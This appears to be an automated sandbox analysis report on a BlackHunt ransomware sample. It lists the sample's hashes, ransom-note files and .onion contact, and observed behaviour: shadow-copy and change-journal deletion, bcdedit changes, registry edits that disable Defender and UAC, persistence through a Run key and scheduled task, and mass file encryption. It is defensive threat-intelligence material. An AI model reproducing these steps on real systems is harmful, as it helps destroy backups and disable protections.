Analysis
-
max time kernel
155s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:41
Static task
static1
Behavioral task
behavioral1
Sample
6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe
Resource
win10v2004-20231215-en
General
-
Target
6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe
-
Size
707KB
-
MD5
951b53a265326b45c79e6d46245bf022
-
SHA1
024626c64d9376e8286ff879fa6867a511135dca
-
SHA256
6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d
-
SHA512
22e831a2a92e3db28b7a07808f5537f3f1daa14e7f2edd6ad41bc86322b3a164efa3482c89e128f657c1b63c3db8aa4eb319dbf6f5964acf603c2f2b9e118d6f
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza138Jvnh:6uaTmkZJ+naie5OTamgEoKxLWeth
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3792 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2576 bcdedit.exe 4792 bcdedit.exe -
Renames multiple (1205) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5712 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\M: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\J: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\P: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\K: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\Q: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\T: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\W: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\B: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\X: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\L: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\I: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\S: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\H: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\V: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\U: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\A: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\G: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\Z: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\R: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened (read-only) \??\O: 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jre-1.8\bin\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightDemiBold.ttf 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\santuario.md 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\splash_11-lic.gif 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\local_policy.jar 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\en-US.pak 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\de\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\editpdf.svg 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses-hover.svg 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_18.svg 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#BlackHunt_Private.key 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\th\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_ReadMe.txt 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe File created C:\Program Files\#BlackHunt_ReadMe.hta 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4944 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3824 vssadmin.exe 2880 vssadmin.exe 2176 vssadmin.exe 852 vssadmin.exe 4984 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Token: SeRestorePrivilege 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Token: SeBackupPrivilege 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Token: SeTakeOwnershipPrivilege 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Token: SeAuditPrivilege 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Token: SeSecurityPrivilege 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Token: SeIncBasePriorityPrivilege 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Token: SeBackupPrivilege 1668 vssvc.exe Token: SeRestorePrivilege 1668 vssvc.exe Token: SeAuditPrivilege 1668 vssvc.exe Token: SeBackupPrivilege 948 wbengine.exe Token: SeRestorePrivilege 948 wbengine.exe Token: SeSecurityPrivilege 948 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3884 wrote to memory of 1912 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 89 PID 3884 wrote to memory of 1912 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 89 PID 3884 wrote to memory of 3544 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 91 PID 3884 wrote to memory of 3544 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 91 PID 3884 wrote to memory of 4588 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 94 PID 3884 wrote to memory of 4588 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 94 PID 3884 wrote to memory of 2228 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 95 PID 3884 wrote to memory of 2228 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 95 PID 3884 wrote to memory of 4804 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 97 PID 3884 wrote to memory of 4804 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 97 PID 4804 wrote to memory of 1176 4804 cmd.exe 99 PID 4804 wrote to memory of 1176 4804 cmd.exe 99 PID 1912 wrote to memory of 3960 1912 cmd.exe 103 PID 1912 wrote to memory of 3960 1912 cmd.exe 103 PID 3544 wrote to memory of 4532 3544 cmd.exe 104 PID 3544 wrote to memory of 4532 3544 cmd.exe 104 PID 4588 wrote to memory of 3048 4588 cmd.exe 100 PID 4588 wrote to memory of 3048 4588 cmd.exe 100 PID 2228 wrote to memory of 4484 2228 cmd.exe 101 PID 2228 wrote to memory of 4484 2228 cmd.exe 101 PID 3884 wrote to memory of 5052 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 105 PID 3884 wrote to memory of 5052 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 105 PID 3884 wrote to memory of 1968 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 106 PID 3884 wrote to memory of 1968 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 106 PID 3884 wrote to memory of 2704 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 109 PID 3884 wrote to memory of 2704 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 109 PID 3884 wrote to memory of 3176 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 111 PID 3884 wrote to memory of 3176 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 111 PID 3884 wrote to memory of 4080 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 113 PID 3884 wrote to memory of 4080 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 113 PID 3884 wrote to memory of 4696 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 114 PID 3884 wrote to memory of 4696 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 114 PID 3884 wrote to memory of 4904 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 117 PID 3884 wrote to memory of 4904 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 117 PID 3884 wrote to memory of 2880 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 119 PID 3884 wrote to memory of 2880 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 119 PID 3884 wrote to memory of 1636 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 121 PID 3884 wrote to memory of 1636 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 121 PID 1968 wrote to memory of 2304 1968 cmd.exe 122 PID 1968 wrote to memory of 2304 1968 cmd.exe 122 PID 5052 wrote to memory of 1548 5052 cmd.exe 123 PID 5052 wrote to memory of 1548 5052 cmd.exe 123 PID 2704 wrote to memory of 1884 2704 cmd.exe 130 PID 2704 wrote to memory of 1884 2704 cmd.exe 130 PID 3884 wrote to memory of 852 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 125 PID 3884 wrote to memory of 852 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 125 PID 4080 wrote to memory of 3376 4080 cmd.exe 129 PID 4080 wrote to memory of 3376 4080 cmd.exe 129 PID 4696 wrote to memory of 4832 4696 cmd.exe 127 PID 4696 wrote to memory of 4832 4696 cmd.exe 127 PID 4904 wrote to memory of 1724 4904 cmd.exe 131 PID 4904 wrote to memory of 1724 4904 cmd.exe 131 PID 3176 wrote to memory of 556 3176 cmd.exe 128 PID 3176 wrote to memory of 556 3176 cmd.exe 128 PID 3884 wrote to memory of 3640 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 132 PID 3884 wrote to memory of 3640 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 132 PID 2880 wrote to memory of 1772 2880 cmd.exe 133 PID 2880 wrote to memory of 1772 2880 cmd.exe 133 PID 1636 wrote to memory of 2320 1636 cmd.exe 135 PID 1636 wrote to memory of 2320 1636 cmd.exe 135 PID 3884 wrote to memory of 4692 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 137 PID 3884 wrote to memory of 4692 3884 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe 137 PID 852 wrote to memory of 3016 852 cmd.exe 138 PID 852 wrote to memory of 3016 852 cmd.exe 138 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 6cb7ce37c443aded293950fceb6c92c2164b250e68586d4e3989c795ba3d849d.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
